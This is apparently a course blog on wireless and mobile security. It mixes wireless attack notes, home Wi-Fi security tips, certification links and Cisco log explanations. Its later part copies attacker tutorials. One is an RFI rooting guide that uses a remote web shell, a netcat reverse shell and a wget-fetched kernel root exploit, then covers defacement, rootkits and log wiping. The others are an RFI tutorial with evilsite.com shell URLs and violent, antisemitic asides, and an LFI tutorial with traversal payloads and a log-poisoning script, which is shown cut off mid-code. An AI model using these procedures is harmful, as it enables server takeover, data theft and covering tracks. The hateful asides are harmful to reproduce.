1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely

http://www.insecure.in/wireless_hacking.asp

List of Wireless Certification

2009-02-08T18:52:00.000-08:00

CISCO

http://www.cisco.com/web/learning/le3/learning_career_certifications_and_learning_paths_home.html

1. CCNA Wireless Certification

Cisco Certified Network Associate Wireless (CCNA® Wireless) validates associate-level knowledge and skills to configure, implement and support of wireless LANs, specifically those networks using Cisco equipment. With a CCNA Wireless certification, network professionals can support a basic wireless network on a Cisco WLAN in a SMB to enterprise network. The CCNA Wireless curriculum includes information and practice activities to prepare them for configuring, monitoring and troubleshooting basic tasks of a Cisco WLAN in SMB and Enterprise networks.

http://www.cisco.com/web/learning/le3/le2/le0/le2/learning_certification_type_home.html

2. CCIE Wireless Certification

The Cisco CCIE Wireless certification assesses and validates wireless expertise. Candidates who pass the CCIE Wireless certification exams demonstrate broad theoretical knowledge of wireless networking and a solid understanding of wireless local area networking (WLAN) technologies from Cisco, the market leader in WLAN technology.

http://www.cisco.com/web/learning/le3/ccie/wireless/index.html

Cisco Advanced Wireless LAN Design Specialist

The Cisco Advanced Wireless LAN Design Specialist will demonstrate the ability to successfully design solutions using the advanced feature set of Cisco wireless products and based on a validated understanding of radio frequency and antenna theory, 802.11a/b/g standards, site survey and configuration of controllers and APs. Solutions include voice over WLAN, outdoor mesh and secure wireless.

http://www.cisco.com/web/learning/le3/le2/le41/le86/le95/learning_certification_type_home_extra_level.html

CWNA® (Certified Wireless Network Administrator)

http://www.cwnp.com/cwna/

Cisco PIX Firewall System Log Messages - End Configuration Replication

2009-02-03T18:47:00.000-08:00

Log Message %PIX-1-709004: (Primary) End Configuration Replication (ACT)
Explanation This is a failover message. This message is logged when the Active unit completes replicating its configuration on the Standby unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.

Log Message %PIX-1-709006: (Primary) End Configuration Replication (STB)
Explanation This is a failover message. This message is logged when the Standby unit completes replicating a configuration sent by the Active unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.

http://www.cisco.com/en/US/docs/security/pix/pix44/system/message/pixemsgs.html

10 Tips for Wireless Home Network Security / 10 Tips Keselamatan Tanpa Wayar

2009-02-02T19:45:00.000-08:00

Many folks setting up wireless home networks rush through the job to
get their Internet connectivity working as quickly as possible. That's
totally understandable. It's also quite risky as numerous security
problems can result. Today's Wi-Fi networking products don't always
help the situation as configuring their security features can be time-
consuming and non-intuitive. The recommendations below summarize the
steps you should take to improve the security of your home wireless
network.

1. Change Default Administrator Passwords (and Usernames)
At the core of most Wi-Fi home networks is an access point or router.
To set up these pieces of equipment, manufacturers provide Web pages
that allow owners to enter their network address and account
information. These Web tools are protected with a login screen
(username and password) so that only the rightful owner can do this.
However, for any given piece of equipment, the logins provided are
simple and very well-known to hackers on the Internet. Change these
settings immediately.

2. Turn on (Compatible) WPA / WEP Encryption
All Wi-Fi equipment supports some form of encryption. Encryption
technology scrambles messages sent over wireless networks so that they
cannot be easily read by humans. Several encryption technologies exist
for Wi-Fi today. Naturally you will want to pick the strongest form of
encryption that works with your wireless network. However, the way
these technologies work, all Wi-Fi devices on your network must share
the identical encryption settings. Therefore you may need to find a
"lowest common demoninator" setting.

3. Change the Default SSID
Access points and routers all use a network name called the SSID.
Manufacturers normally ship their products with the same SSID set. For
example, the SSID for Linksys devices is normally "linksys." True,
knowing the SSID does not by itself allow your neighbors to break into
your network, but it is a start. More importantly, when someone finds
a default SSID, they see it is a poorly configured network and are
much more likely to attack it. Change the default SSID immediately
when configuring wireless security on your network.

4. Enable MAC Address Filtering
Each piece of Wi-Fi gear possesses a unique identifier called the
physical address or MAC address. Access points and routers keep track
of the MAC addresses of all devices that connect to them. Many such
products offer the owner an option to key in the MAC addresses of
their home equipment, that restricts the network to only allow
connections from those devices. Do this, but also know that the
feature is not so powerful as it may seem. Hackers and their software
programs can fake MAC addresses easily.

5. Disable SSID Broadcast
In Wi-Fi networking, the wireless access point or router typically
broadcasts the network name (SSID) over the air at regular intervals.
This feature was designed for businesses and mobile hotspots where Wi-
Fi clients may roam in and out of range. In the home, this roaming
feature is unnecessary, and it increases the likelihood someone will
try to log in to your home network. Fortunately, most Wi-Fi access
points allow the SSID broadcast feature to be disabled by the network
administrator.

6. Do Not Auto-Connect to Open Wi-Fi Networks
Connecting to an open Wi-Fi network such as a free wireless hotspot or
your neighbor's router exposes your computer to security risks.
Although not normally enabled, most computers have a setting available
allowing these connections to happen automatically without notifying
you (the user). This setting should not be enabled except in temporary
situations.

7. Assign Static IP Addresses to Devices
Most home networkers gravitate toward using dynamic IP addresses. DHCP
technology is indeed easy to set up. Unfortunately, this convenience
also works to the advantage of network attackers, who can easily
obtain valid IP addresses from your network's DHCP pool. Turn off DHCP
on the router or access point, set a fixed IP address range instead,
then configure each connected device to match. Use a private IP
address range (like 10.0.0.x) to prevent computers from being directly
reached from the Internet.

8. Enable Firewalls On Each Computer and the Router
Modern network routers contain built-in firewall capability, but the
option also exists to disable them. Ensure that your router's firewall
is turned on. For extra protection, consider installing and running
personal firewall software on each computer connected to the router.

9. Position the Router or Access Point Safely
Wi-Fi signals normally reach to the exterior of a home. A small amount
of signal leakage outdoors is not a problem, but the further this
signal reaches, the easier it is for others to detect and exploit. Wi-
Fi signals often reach through neighboring homes and into streets, for
example. When installing a wireless home network, the position of the
access point or router determines its reach. Try to position these
devices near the center of the home rather than near windows to
minimize leakage.

10. Turn Off the Network During Extended Periods of Non-Use
The ultimate in wireless security measures, shutting down your network
will most certainly prevent outside hackers from breaking in! While
impractical to turn off and on the devices frequently, at least
consider doing so during travel or extended periods offline. Computer
disk drives have been known to suffer from power cycle wear-and-tear,
but this is a secondary concern for broadband modems and routers.

If you own a wireless router but are only using it wired (Ethernet)
connections, you can also sometimes turn off Wi-Fi on a broadband
router without powering down the entire network.
More Info

http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm

Introduction to Wireless Networking / Pengenalan kepada Rangkaian Tanpa Wayar

2009-02-02T19:43:00.000-08:00

Part 1
http://www.windowsnetworking.com/articles_tutorials/Introduction-Wire...

Part 2
http://www.windowsnetworking.com/articles_tutorials/Introduction-Wire...

Part 3
http://www.windowsnetworking.com/articles_tutorials/Introduction-Wire...

Important url for wireless networking

2009-02-02T19:42:00.001-08:00

http://computer.howstuffworks.com/wireless-network.htm/printable

http://en.wikipedia.org/wiki/Wi-Fi

Comparison chart - Wireless local area network standards
http://en.wikipedia.org/wiki/IEEE_802.11
http://en.wikipedia.org/wiki/IEEE_802.11a
http://en.wikipedia.org/wiki/IEEE_802.11b
http://en.wikipedia.org/wiki/IEEE_802.11g
http://en.wikipedia.org/wiki/IEEE_802.11n

http://en.wikipedia.org/wiki/List_of_WLAN_channels

Wireless Standards - 802.11b 802.11a 802.11g and 802.11n
http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm

Comparison of Wireless LAN Standards - 802.11a versus 802.11b
http://www.mobileinfo.com/wireless_lans/802.11a_802.11b.htm

http://en.wikipedia.org/wiki/Wireless_access_point
http://en.wikipedia.org/wiki/Wireless_LAN

Important url for wireless security

2009-02-02T19:39:00.000-08:00

http://en.wikipedia.org/wiki/Wi-Fi

Comparison chart - Wireless local area network standards

http://en.wikipedia.org/wiki/IEEE_802.11

http://en.wikipedia.org/wiki/IEEE_802.11a

http://en.wikipedia.org/wiki/IEEE_802.11b

http://en.wikipedia.org/wiki/IEEE_802.11g

http://en.wikipedia.org/wiki/IEEE_802.11n

http://en.wikipedia.org/wiki/List_of_WLAN_channels

Wireless Standards - 802.11b 802.11a 802.11g and 802.11n

http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm

Comparison of Wireless LAN Standards - 802.11a versus 802.11b

http://www.mobileinfo.com/wireless_lans/802.11a_802.11b.htm

http://en.wikipedia.org/wiki/Wireless_access_point

http://en.wikipedia.org/wiki/Wireless_LAN

Discussion Groups for IWD 2243 session 2009

2009-02-02T19:35:00.000-08:00

To all wireless and mobile security students, please register your name here

http://groups.google.com/group/iwd2243-09

FAQ from firewall admim to the client for troubleshooting purpose

2009-01-26T16:25:00.000-08:00

@ Jan 13 2009, 09:22 AM

Let say you are working as firewall admin. One day, client A has calling you and tells that he have problem to access application in server B.
I was wondering if anyone here are working as firewall support, what are the questions that you need to ask if the incident like this happen to you? I’ll list some of them and the purpose why the information is needed, maybe you could add or give better suggestion.

1. What is the firewall name/ip address (so we know which firewall involved in this incident)
2. What is the source and destination ip address (so we can check whether the traffic hit the firewall or not)
3. traceroute result from source to destination ip. (so we know if the traffic was dropped at somewhere else)
4. what is the incident number (if you are using the ticketing system so we can keep track what happened.)
5. Has this work before? (if it worked, the possibilities of some changes has been done to the firewall or server)

Blake @ Jan 13 2009, 03:22 PM

6. What application and protocol are they using to access the server.
7. Can they access any other server using the same application and protocol
8. Has the client or host made any upgrades or patches recently
9. What version of VPN software is the client using.
Also I always start a remote desktop session using logmein.com or some other software. Speeds up the entire process when you can see the clients desktop.

packet @ Jan 19 2009, 11:31 PM

And of course:

10: when did it stop working?
11: Reboot!

Comparison of Wireless LAN Standards

2009-01-26T03:36:00.000-08:00

http://www.brainbell.com/tutorials/Networking/FHSS_DSSS_And_802.11_Standards.html

http://www.mobileinfo.com/wireless_lans/802.11a_802.11b.htm

SANS InfoSec Reading Room - Wireless Access

2009-01-26T03:05:00.000-08:00

Various great papers on Wireless Security can be found here...

http://www.sans.org/reading_room/whitepapers/wireless/

Crack WEP?

2009-01-26T02:31:00.000-08:00

How To Crack WEP - Part 1 - 3

How To Crack WEP - Part 1: Setup & Network Recon

http://www.tomsguide.com/us/how-to-crack-wep,review-451.html

http://www.tomsguide.com/us/index.php?ctrl=dossierprint&p1=451

How To Crack WEP - Part 2: Performing the Crack

http://www.tomsguide.com/us/how-to-crack-wep,review-459.html

http://www.tomsguide.com/us/index.php?ctrl=dossierprint&p1=459

How To Crack WEP - Part 3: Securing your WLAN

http://www.tomsguide.com/us/how-to-crack-wep,review-471.html

http://www.tomsguide.com/us/index.php?ctrl=dossierprint&p1=471

WEP: Dead Again, Part 1

Michael Ossmann 2004-12-14

http://www.securityfocus.com/infocus/1814

WEP: Dead Again, Part 2
Michael Ossmann 2005-03-08

http://www.securityfocus.com/infocus/1824

How RFID Works

2009-01-26T01:24:00.000-08:00

Long checkout lines at the grocery store are one of the biggest complaints about the shopping experience. Soon, these lines could disappear when the ubiquitous Universal Product Code (UPC) bar code is replaced by smart labels, also called radio frequency identification (RFID) tags. RFID tags are intelligent bar codes that can talk to a networked system to track every product that you put in your shopping cart.

Wireless and Mobile Security/Keselamatan Tanpa Wayar dan Mudahalih

2009-01-26T00:15:00.000-08:00

Subject Name	Wireless and Mobile Security
Subject Code	IWD 2243
Status	Teras Major
Level	Diploma
Credit hours	3 hours
Pre Requisite	IWD2323- Computer Security
Assessment	Final examination – 40% Mid-semester test – 20%, Course Work- 40%

Semester Thought

Year 2, Semester 2

Synopsis

The use of wireless networks and mobile communications has become a major trend these days. Wireless and mobile communications offer many benefits such as portability and flexibility, increased productivity, and lower installation costs. Wireless technologies cover a broad range of differing capabilities oriented toward different uses and needs. Wireless local area network (WLAN) devices, for instance, allow users to move their laptops from place to place within their offices without the need for wires and without losing network connectivity. Mobile and wireless security is therefore of high priority. Security measures taken depend on the different protocols, standards, techniques and systems available. A brief introduction to security protocols, standards and corresponding technologies is given in this subject particularly on 2G, 2.5G, 3G and wireless local area networks. Standards, like WAP, IEEE 802.11 and Bluetooth are included as well as the awareness of the vulnerabilities, threats and countermeasures associated with these wireless technologies

Learning Objective

Aim

In this course, student should be able to gain a solid understanding of the security weaknesses of and threats to wireless LANs , understand wireless network design and deployment , implement the best security techniques currently available , introduce the latest security software and protocols for wireless LANs , introduce the best resources for wireless security issues and decisions to the organization

Course learning Outcomes

Upon successful completion of the course, the students should be able to:

Have a clear understanding of the full range of wireless technologies in common use and how to implement them safely.
Understand how to secure wireless systems and prevent threats posed by hackers.
Understand how wireless devices, components and protocols work, how to determine the best wireless solutions for their environments, and how to implement, secure and maintain these solutions.

Error Message %PIX-1-105009: (Primary) Testing on interface int_name result.

2009-01-12T18:27:00.000-08:00

Error Message %PIX-1-105009: (Primary) Testing on interface int_name result.
Explanation This is a failover message. This message reports the result (either "Passed" or "Failed") of a previous interface test. "(Primary)" can also be listed as "(Secondary)" for the secondary unit.

Recommended Action None required if the result is "Passed." If the result is "Failed," you should check the network cable connection to both failover units, that the network itself is functioning correctly, and verify the status of the standby unit.

http://www.cisco.com/univercd/cc/td/doc/product/iaabu/pix/pix_62/syslog/pixemsgs.htm

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

2009-01-09T08:39:00.000-08:00

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

http://www.packetstormsecurity.org/papers/attack/rfitutorial.txt

RFI Tutorial (remote file inclusion)

2009-01-09T03:27:00.000-08:00

Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

Now suppose yo' dad wants a small website. All he wants is three pages.
A blog page where he can update you on how many babies he has killed.
A contact page with his email on it os people can ask advice on the best way to kill babies.
An gallery page where he can show you pictures of all the babies he has killed.

He creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

You would view the pages on his website like this.
Code:
http://www.yodad.com/index.php?page=blog.php
http://www.yodad.com/index.php?page=contact.php
http://www.yodad.com/index.php?page=gallery.php
Let's take a look at the code for index.php

Code:
//html for header
//html for menu
$page = $_GET['page'];
include($page);
?>
//html for footer
On line 2, $page is set to $_GET['page']

This means when we go to
Code:
http://www.yodad.com/index.php?page=blog.php
$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

Say we change "blog.php" to "http://www.google.com"
Code:
http://www.yodad.com/index.php?page=http://www.google.com
You would see the google home page instead of your dads shitty blog.

What's the point of this?

We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

Here's how we would use it:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

Let's look at another example of a RFI.

Undefined variables.

Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

The blog.php file needs these credentials to connect and get the content.

so in index.php:
Code:
//html for header
//html for menu
$database_config_file = "db_details.php";
$page = $_GET['page'];
include($page);
?>
//html for footer
and in blog.php:

Code:
include($database_config_file);
//code to connect to MySQL and get the latest blog posts
?>
Since we are calling blog.php through index.php like this:
Code:
http://www.yodad.com/index.php?page=blog.php
, in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

But, if we went to blog.php directly:
Code:
http://www.yodad.com/blog.php
then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

This is a problem, since we can set it ourselves.
If we go to
Code:
http://www.yodad.com/blog.php?database_config_file=http://evilsite.com/c99.txt
$database_config_file will be set to http://www.evilsite.com/c99.txt

Again, blog.php does not check if what it is including is valid.

...

As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

There are a few ways to prevent these vulnerabilities.

Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
This one is easily bypassed.
index.php:

Code:
$page = $_GET['page'];
include($page . ".php");
?>
This means when we go to index.php?page=home it will actually include home.php.

Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.

Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

Like this:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
Index.php would try and include :
Code:
http://www.evilsite.com/c99.txt?.php
To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.

There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;

Switching.

Code:
$page = $_GET['page'];
switch($page){
case "blog":
include("blog.php");
break;
case "contact":
include("contact.php");
break;
case "gallery":
include("gallery.php");
break;
default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
echo "Choose a page from our fine selection!1!!";
break;
}
?>

https://per1ova.startlogic.com/showthread.php?t=594

LFI Tutorial (local file inclusion)

2009-01-09T03:24:00.000-08:00

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).

First lets take a look at a php code that is vulnerable to LFI:
Code:
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.

Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.

Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/ passwd
If you don't know what to do with the content of etc/passwd then continue reading! The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:

username: passwd:UID:GID:full_name:directory:shell

For example:

username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh

All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:

username:x:503:100:FullName:/home/username:/bin/sh

As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many
processes, thats why you have access to it).

You can also sometimes see something like this:

username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the etc/security/passwd file.

Heres a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.

Just one more quick thing, its also common to find a vulnerable code like:
Code:
$page = $_GET["page"];
include("$page.php");
?>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../ etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte ():
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
With the null byte the server will ignore everything that comes after .

There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin!

We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".

This possibly won't work because if you go look into the log you will probably see the php code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
